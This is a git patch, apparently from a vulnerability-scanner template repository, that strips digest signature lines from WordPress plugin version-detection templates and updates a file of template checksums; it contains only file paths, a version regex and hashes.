b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220008d4e347a4395ead52469baf55adce862ba5b2616e289f5f63eefbc8478965702202eebe42089288ba7b8fc1db744060fb48d1b2161da238200609921bb94bab54f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 970ff8bb9f..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e2785f6cb930f8166543b83767865bcf955d2a7c7c81ed5f67201ff7753d476e022043f99ae69f80acbba231fc379f00c872f74f05f9f862d37008d6f566ceef1567:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 707a2fcc3b..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ba693bb35d8a23f3649318c59d12a791fda8719fd7dd9f4e59b20d070c072ec002204048db8d3f31db6e784eadc01a06b7ee73e9a603c2aaf12a4237b54c97f53165:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5fb9e41303..e83e8d79e7 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d4526158550ae7bc03ea6a1fde92d76e8633757e279bec6237fbb7ee1540bcc902207d643857f507cb7658cd2f934df0835409f25e180875775249e12d4cc584c624:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 44a5ecc719..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d77e4e1b54e0f79c6d10b0b94352a93a930efdd4e18ea47a55109c476a39d6aa02204da3b7e55b9822518c66d707920acf2c77118a6804c6433dcab3f0dfd45f5351:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 55dedb0cfa..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d00141ca4666d90a25ad1570387ed8230b7126bee00333d8ad59f58dea83ccf602210099a05d3b41d7fcb1ca6bf9a5a19b414f4e593bef149c6d572eaf96ad26bb9b7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 20104414a7..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022038b979308831a4de13336eda4eb2dc7a3a19bf69de94451dfbb812b8dd77165102204adef3cc68f6d0746135af04bb40d755962025900cc021774b4076396fa62ba0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index d19a4f2107..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204c47d6833096e5cab4083b2fd48b5308a875aa977741046106c987ccdffb2be402207d266abc4f289d7573c3de74bcc856584f144492f088d55a80cd03c72ee191c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 1eddc4505c..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220035dd53f1f3d4b35135626933f1b0fc69a99a8ad2989fd39522e57d15fc04489022100e3f7404699d1141f42d1e441d6a22656c050b931dfe403a9e7d43160bee53cd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 74996d51ff..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b7f3bbf49eab6da3f0f7a1817d17f1e212e41c8babe48a8eafc11262d3d54ca902205e2d98a8200e91eae4f43deaf9f103f4763229efbdfa8657b39d150b18f8361c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 0a44ff0ec3..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022001a25bb07be1b50346cde0e8efd3bd26a43e0f836126a54c2d55b224591d55040220271b89f63bb0425e87152ddac104e4c5823289bcdb2511f93d4467a89c791a01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 5e7709d02f..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205f73bcc4310995aad98286b869c1d091ba0c8752e1e79e5cce9eda82aa4256d4022100fc3e38193c19a4cad83c73afb1ffe93572de93e82a34d53313259130fa6781f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index c06a4e5195..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fe8953ad1bd0472f06dfc999bc9a89f3e0d58d0e59e827003b53ae8f81449b3b022100dd9dcc92cfad9b0227afc561a877eab2afd51c36498aa0e1d6a0b4f5755fd26e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 12ea9ef98b..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022063de6e7028c4eb9f2c37c23b23f0d43c3e142ac475a9bbf6e66e04edc1f5730a022100e9ea2f8b908f34b3f5cfb39ec8b1e1778761f1460ec7cd7caee7e12cfa2e75d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 50dcf1a085..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f807ccfb94a7fa830716581ee13f251d6851482eef1fe56d602f8a09b2a196e202210082c4fe2c5747954e796fbcaccc95dca30d0da5518b7a4a6019fdb7e4009da54f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 9a40f12ac3..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203bef3790191d939e91d1d25aeb1d2952b858ae02093b777c479dc5848f1ac60e02204aa604f8b3d91a1ed7feeb71fb415d491e8d4a23794dae9582f1d773e4e9b5cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 50d5419b82..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009a0aa8085acf1f93393266eff05cb5a67542e5fa2de91e6f414c6d6b9f82acfc022007957b647687643f025dd53630b93dd962e950f19d8cfa9ff89dc64e0b6c0efd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 63105125e6..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205cc57225c18cf780973e30efb2d67288a434843cb69503b0dda6b4545d4b53b7022100d71787660fc45854f4dd3b34ad3616f97839a94f62732f89fdcbc64e2173c085:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 45d1746c0f..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210098c2e9d7771aafc2d00a0dc18a4660240d6e7c5561276d23a9079d2c2bbac3f6022100ff1f929f1da8bb3d7a3ab06f9ded49f91b2f985606fdabf1fb0b2cf058f2862c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index e72d887b33..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a9789d86e96e5a1d151fe5c58f1e8417e45e666520c9eef6319b7719531df75a022100e1fd2ccdea72d9986236090d96685c91fafbcf8c6e0dfc3de51daa4609f70504:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 7fa69eee0d..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022022c7f0a9c85231a6f1338753303accca8ac402c07ccdf08b6cf82568ada732e6022100bbd31da817a3b5f4b018ce558c9dea6fe0e523b8001d02147fab007f187dda5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 3b22d57dbd..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100839ccdd6ad735f000b03b478dc31cd59ecddfb1c6a1ead31485cad39c5a4651802210099af6ba7ad32038e766b60387e93ad6953a9bdeb2716f1916d683c6dd2e02eaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index fca822daac..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022062ee72ac9565ee115799a6efbacaa99a4449687ca92912d280bb71179ff39183022100fe31f0688991a0c02af17a8a4e7616ff6ddbfdfa9e5544b11ed44c0a2719fdf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 4cfe930efb..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220660634ea387d8fc7aa8e1d40f37eddb2424e8218e4b6ebbc78f380a26d683586022100ac9bb4a1e4fed2fbf472e25f926262b896e81ac61cbf0488363f4f87893c8037:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index f5740a43e8..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b969f12b72732405ded351467b89758afa0b311a50e54280601e76ce4bf416c00221009260d162733f85390a154b09754d6c64489133045ee9a43c5802433447486168:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index c69fab8743..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a61f75d5af8c686731bd7723429cad81381bcce9d215ecfe15d70821dbaf2f13022038ccb6aa5c61577ac3502a015d9b8d23acda39e109ea624051f5d566e02d826f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index a873e39bf6..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205822127b6057a28a121200f62161b83ad999689ad33519c36798965adccbc0dc022100d7774ea0b3200134dd12589853dd55062efcdbd75fd06d40ee3ed42d08ecc982:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 22bb52b7ec..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d414972ed3409afe1be0d79db3db167596c1b9c056ab25500739f6808c3ff82002205f10962268f1074b4fce30a9957207ca6acd21000706f7fc7e24e368e7b3b017:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 2a283d6155..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210098c93a29373629a54b0006f79a36bb071f2234d0aaeeb6591b9ed372eddb658d022100aeaaf2f4307288f2b48211bc34bc508419e917595068611bb7336d12e41efa10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index e33e6d5dfa..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022034f34e02f3c509438eea3a9662cfa1ebdde0792fca359f96baa21202231f7119022100a6cdebbcbcb2e69bb7d4e9cece06ddfd1bab457942dc80490d59f3f4602c1f53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index a3579bace4..58e5e828bf 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100879bf570242c1cdbdc486be684d444356fc649f4f248be005dca3b43bd1d233c022011a03e6527c0a6f5429fb930c267e8dbc3517e82c0353e5f6bda9d72ea067905:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 01fb1f55e9..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100841a7b4b4cc1a174acaec2f68e7f072f0c786203d522154909a3f5593222068802204c5dee4875c157b4b6d2764076ddbae49a1da73b75bd79b7d07767e8317dd9b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index ea5e831a03..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ddf07306ab0b6c12a07ec62b90a7218261f1d3574b12ea49f9ebe7512a3873c4022100b6d68304809545b3da737f73d8e3a3a5f0cecb1d6c04fc358a55b7db16b17e39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index e4405facbd..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210092ae257fcb83884c1075cee048d1b6d77c9477f897ca2cad599a7baa8e06e94102206819a31cbb62915ccd7de9376d2b3e053b2d271f41e9e970945520c4fa82ef4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 3e9856cce822850e084096dad32759beb7e7141a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 9 Jul 2024 08:46:24 +0000 Subject: [PATCH 0995/1841] Auto Generated Templates Checksum [Tue Jul 9 08:46:24 UTC 2024] :robot: --- templates-checksum.txt | 424 ++++++++++++++++++++--------------------- 1 file changed, 212 insertions(+), 212 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b24f79f957..5d06101994 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -802,9 +802,9 @@ helpers/wordpress/plugins/force-regenerate-thumbnails.txt:8bff12eeb621c3f4c18ae1 helpers/wordpress/plugins/formidable.txt:309bd303ec4d8c564bacf4b39075aa7866dcdea4 helpers/wordpress/plugins/forminator.txt:6ee02b82336e55125a24970b177a069b10306436 helpers/wordpress/plugins/ga-google-analytics.txt:a0dab5f80a9088edfc02fe1a85d2d833a5c55075 -helpers/wordpress/plugins/gdpr-cookie-compliance.txt:2f4af87dfd67a2385a4e30cfbd4d57d669853135 -helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:bc9981e1c7ebf53d15d8cf9698c2bb6137881fc9 -helpers/wordpress/plugins/google-analytics-for-wordpress.txt:ba46cbfd15f3e265cd93b9b01e7e97a6fbfa3a14 +helpers/wordpress/plugins/gdpr-cookie-compliance.txt:cf32739ccdf9900e27611336c93027a7d59f0e18 +helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:b9236ecbf27032a6e5d49e873bc21600f0dab73c +helpers/wordpress/plugins/google-analytics-for-wordpress.txt:51e5b4744f672fbc75ac2043bb18ffd8d1d563c3 helpers/wordpress/plugins/google-listings-and-ads.txt:f0500ea689c78156fdded5bae29d903f2d632a9b helpers/wordpress/plugins/google-site-kit.txt:451786e82a4757f98ef5d85c39adb09689db4c3f helpers/wordpress/plugins/google-sitemap-generator.txt:8219d4ef07eba68c05cb812b66a743661925aa25 @@ -819,7 +819,7 @@ helpers/wordpress/plugins/health-check.txt:9b80ca131fbc6cb5a944359bf46b2f5f301b2 helpers/wordpress/plugins/hello-dolly.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad helpers/wordpress/plugins/host-webfonts-local.txt:e00602f1c349065df0c9ef24dec6d03c9f5a1ecf helpers/wordpress/plugins/hostinger.txt:2eb538e42b910c397ab801353b059c51f265f092 -helpers/wordpress/plugins/image-optimization.txt:e2060004dffbdc6873d309c73a458221a047212b +helpers/wordpress/plugins/image-optimization.txt:a9ec402f06cdb367cb4ecd9d221265dbc42431cf helpers/wordpress/plugins/imagify.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 helpers/wordpress/plugins/imsanity.txt:6b6e01beb45fb7f89787efd83e89589ecafc6104 helpers/wordpress/plugins/insert-headers-and-footers.txt:b02d54c37a0b10952ea10194f9d0deec6e24ff40 @@ -848,7 +848,7 @@ helpers/wordpress/plugins/members.txt:2beef4f1a38f9db1c05a1e49977c956626624d66 helpers/wordpress/plugins/meta-box.txt:55193864c8fe639aac62a66b52b3b102397e0cf9 helpers/wordpress/plugins/metform.txt:714503a3af828a0db664fd44681d548aba3ee3a7 helpers/wordpress/plugins/ml-slider.txt:80ed6599146b54137db225fcbb582290d8512149 -helpers/wordpress/plugins/newsletter.txt:806b01f722148eb1b6ddf37464ad8f18232e6422 +helpers/wordpress/plugins/newsletter.txt:546125357bf982752670c95debb34247c20f3724 helpers/wordpress/plugins/nextend-facebook-connect.txt:f6eab21f4096ab86124a60f5d8ae48626e598de9 helpers/wordpress/plugins/nextgen-gallery.txt:8c695bf155c8053505aaa583b04fbde1a8491860 helpers/wordpress/plugins/ninja-forms.txt:ce69bc556a6db2eb8d56b75a008630d482b077ce @@ -902,8 +902,8 @@ helpers/wordpress/plugins/the-events-calendar.txt:44dbfaa714938949bc31889d586fe8 helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/tinymce-advanced.txt:93ab266c89e9dcb536484607a605b05e657be940 helpers/wordpress/plugins/translatepress-multilingual.txt:036622d5a32b0e5099f20d8cff7515dc042253aa -helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:c9c181c9f96586d496156693f0242af36cb51b9a -helpers/wordpress/plugins/under-construction-page.txt:17bb8bf9f231900aaec8e0d2788c3fa060ef1c5c +helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:a2386393a973e72dbd27804a8dc3f6ef5962f536 +helpers/wordpress/plugins/under-construction-page.txt:93c73a1987305f0a1f548b0025a3cb9e15bf420f helpers/wordpress/plugins/unyson.txt:08105b9ddd906ead00c6c2b76a45ffa54f0efc2d helpers/wordpress/plugins/updraftplus.txt:e091c0a7d31789d70b4711b992ca9a2e1e822cea helpers/wordpress/plugins/use-any-font.txt:76aa3af2b1beb37efc64c37b686676bbf23eb2bb @@ -3185,9 +3185,9 @@ http/cves/2023/CVE-2023-35078.yaml:4986f8899e309eabfe7de47ac607fc17bc6e2306 http/cves/2023/CVE-2023-35082.yaml:37ad71a404ca250f882e69f45503631e001653a2 http/cves/2023/CVE-2023-35156.yaml:72c2e061bd7264a8e88e39bed12978ba41608ad8 http/cves/2023/CVE-2023-35158.yaml:76d09942bb434d541e43eb224218c181af2a2f1f -http/cves/2023/CVE-2023-35159.yaml:4731de3bf42d2357bce1a099356b1812121e06ed +http/cves/2023/CVE-2023-35159.yaml:9f8fc8da01c8040e353b9610eb25ec936e90babb http/cves/2023/CVE-2023-35160.yaml:18c32e9c618ae99d50b0d2772e2196b575e2ba36 -http/cves/2023/CVE-2023-35161.yaml:3d76e95e4d9eda1ca30d6f463c478b49d420282e +http/cves/2023/CVE-2023-35161.yaml:fa11ab42365fadb4cc5d8cdd38720d6f001ea994 http/cves/2023/CVE-2023-35162.yaml:b3c53552dcd6e3ef5ee198684f10ef0eec25f283 http/cves/2023/CVE-2023-35813.yaml:071b2cdd7e888724f69f9772dafccd2fd315b143 http/cves/2023/CVE-2023-35843.yaml:fff3bc3dfbc836e0287b00ec362b9c5dda57a0a0 @@ -4209,7 +4209,7 @@ http/exposed-panels/kubernetes-enterprise-manager.yaml:301e583ab29f38845e3f2a3bf http/exposed-panels/kubernetes-mirantis.yaml:a6c0cb37f6236c31abc9abc66203287f3472ca1f http/exposed-panels/kubernetes-web-view.yaml:cb26942f509ff217b06fbba0b161722f84d73a01 http/exposed-panels/kubeview-dashboard.yaml:1b71d18b85609b07a745b5484d3f19e731d70cf4 -http/exposed-panels/label-studio-panel.yaml:29126ae5c2392d5711ba8620c405f792824db6ec +http/exposed-panels/label-studio-panel.yaml:e6b9bd719b136869df9f602836e0623a103dbe10 http/exposed-panels/labkey-server-login.yaml:f9fd45b35a87971398e6310809351538e12a8024 http/exposed-panels/labtech-panel.yaml:f1d86b82c3030894eeea5866bde98f51bbf63af5 http/exposed-panels/lacie-panel.yaml:f105dc22138769cd5b966bdb325b84dd44f8c641 @@ -6883,7 +6883,7 @@ http/technologies/apache/default-apache2-page.yaml:3d32235cea4d966860cdac0d2832a http/technologies/apache/default-apache2-ubuntu-page.yaml:808d8b7991a7e1624b70d1fe1dcc452360318433 http/technologies/apache/kafka-manager-panel.yaml:dc3bc4035bc4069f3529349675f2c3e0ef6a1ede http/technologies/apache/ranger-detection.yaml:15fbdedf1fbe105e4bdbb03b8c6a449097801a74 -http/technologies/apache/tomcat-detect.yaml:91e9fd95e5188f7b4529a787f1a7da29335c0647 +http/technologies/apache/tomcat-detect.yaml:3bd2133fba7b5fe61bb625caf06691f0c6245c59 http/technologies/apache/xampp-default-page.yaml:1a2e9ae4aef8adc79a4a34e693b351bfcc23f8f9 http/technologies/apache-allura-detect.yaml:15c34736226f419e17b17aec0fe92f2171cd1cb8 http/technologies/apollo-server-detect.yaml:44245d09c9ad3e3fbca5d699041ac2bd23d329f2 @@ -7262,228 +7262,228 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d 